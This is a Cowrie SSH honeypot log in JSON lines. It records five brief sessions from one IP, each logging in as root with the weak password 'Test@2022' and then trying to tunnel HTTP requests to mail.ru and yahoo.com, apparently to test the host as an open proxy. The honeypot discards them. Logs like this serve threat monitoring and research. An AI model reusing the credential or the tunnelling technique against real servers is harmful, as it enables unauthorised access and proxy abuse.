{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.803394Z","src_ip":"77.83.207.83","session":"04d7302ae5b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:19.843923Z","src_ip":"77.83.207.83","session":"04d7302ae5b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.096135Z","src_ip":"77.83.207.83","session":"04d7302ae5b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5528,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5528","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.147552Z","session":"04d7302ae5b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.198290Z","src_ip":"77.83.207.83","session":"04d7302ae5b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":30211,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30211","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.340924Z","session":"04d7302ae5b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.391560Z","src_ip":"77.83.207.83","session":"04d7302ae5b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":27131,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27131","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.533082Z","session":"04d7302ae5b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.583876Z","src_ip":"77.83.207.83","session":"04d7302ae5b9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.635248Z","src_ip":"77.83.207.83","session":"04d7302ae5b9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2613,"dst_ip":"1.2.3.4","dst_port":22,"session":"58d20ea547d0","protocol":"ssh","message":"New connection: 77.83.207.83:2613 (1.2.3.4:22) [session: 58d20ea547d0]","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.683649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.694045Z","src_ip":"77.83.207.83","session":"58d20ea547d0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.733377Z","src_ip":"77.83.207.83","session":"58d20ea547d0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:20.980424Z","src_ip":"77.83.207.83","session":"58d20ea547d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29689,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29689","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.031366Z","session":"58d20ea547d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.080965Z","src_ip":"77.83.207.83","session":"58d20ea547d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":32508,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:32508","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.219903Z","session":"58d20ea547d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.269500Z","src_ip":"77.83.207.83","session":"58d20ea547d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":26700,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26700","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.411935Z","session":"58d20ea547d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.461491Z","src_ip":"77.83.207.83","session":"58d20ea547d0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.512271Z","src_ip":"77.83.207.83","session":"58d20ea547d0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2708,"dst_ip":"1.2.3.4","dst_port":22,"session":"a28570c5986d","protocol":"ssh","message":"New connection: 77.83.207.83:2708 (1.2.3.4:22) [session: a28570c5986d]","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.562805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.564049Z","src_ip":"77.83.207.83","session":"a28570c5986d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.615181Z","src_ip":"77.83.207.83","session":"a28570c5986d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.869985Z","src_ip":"77.83.207.83","session":"a28570c5986d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1117,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1117","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.921999Z","session":"a28570c5986d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:21.973341Z","src_ip":"77.83.207.83","session":"a28570c5986d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":24544,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24544","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.117460Z","session":"a28570c5986d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.168606Z","src_ip":"77.83.207.83","session":"a28570c5986d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17985,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17985","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.313591Z","session":"a28570c5986d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.364662Z","src_ip":"77.83.207.83","session":"a28570c5986d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.416454Z","src_ip":"77.83.207.83","session":"a28570c5986d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2787,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e4860254ab8","protocol":"ssh","message":"New connection: 77.83.207.83:2787 (1.2.3.4:22) [session: 0e4860254ab8]","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.465016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.466165Z","src_ip":"77.83.207.83","session":"0e4860254ab8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.516268Z","src_ip":"77.83.207.83","session":"0e4860254ab8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.765164Z","src_ip":"77.83.207.83","session":"0e4860254ab8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8479,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8479","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.816653Z","session":"0e4860254ab8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:22.866486Z","src_ip":"77.83.207.83","session":"0e4860254ab8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":8326,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8326","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.008402Z","session":"0e4860254ab8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.058379Z","src_ip":"77.83.207.83","session":"0e4860254ab8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":23022,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23022","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.200267Z","session":"0e4860254ab8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.250181Z","src_ip":"77.83.207.83","session":"0e4860254ab8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.300874Z","src_ip":"77.83.207.83","session":"0e4860254ab8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2889,"dst_ip":"1.2.3.4","dst_port":22,"session":"4effa105a89e","protocol":"ssh","message":"New connection: 77.83.207.83:2889 (1.2.3.4:22) [session: 4effa105a89e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.349611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.350827Z","src_ip":"77.83.207.83","session":"4effa105a89e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.400412Z","src_ip":"77.83.207.83","session":"4effa105a89e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.648706Z","src_ip":"77.83.207.83","session":"4effa105a89e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15444,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15444","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.699282Z","session":"4effa105a89e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.749297Z","src_ip":"77.83.207.83","session":"4effa105a89e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":27104,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27104","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.892234Z","session":"4effa105a89e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:23.942015Z","src_ip":"77.83.207.83","session":"4effa105a89e"}
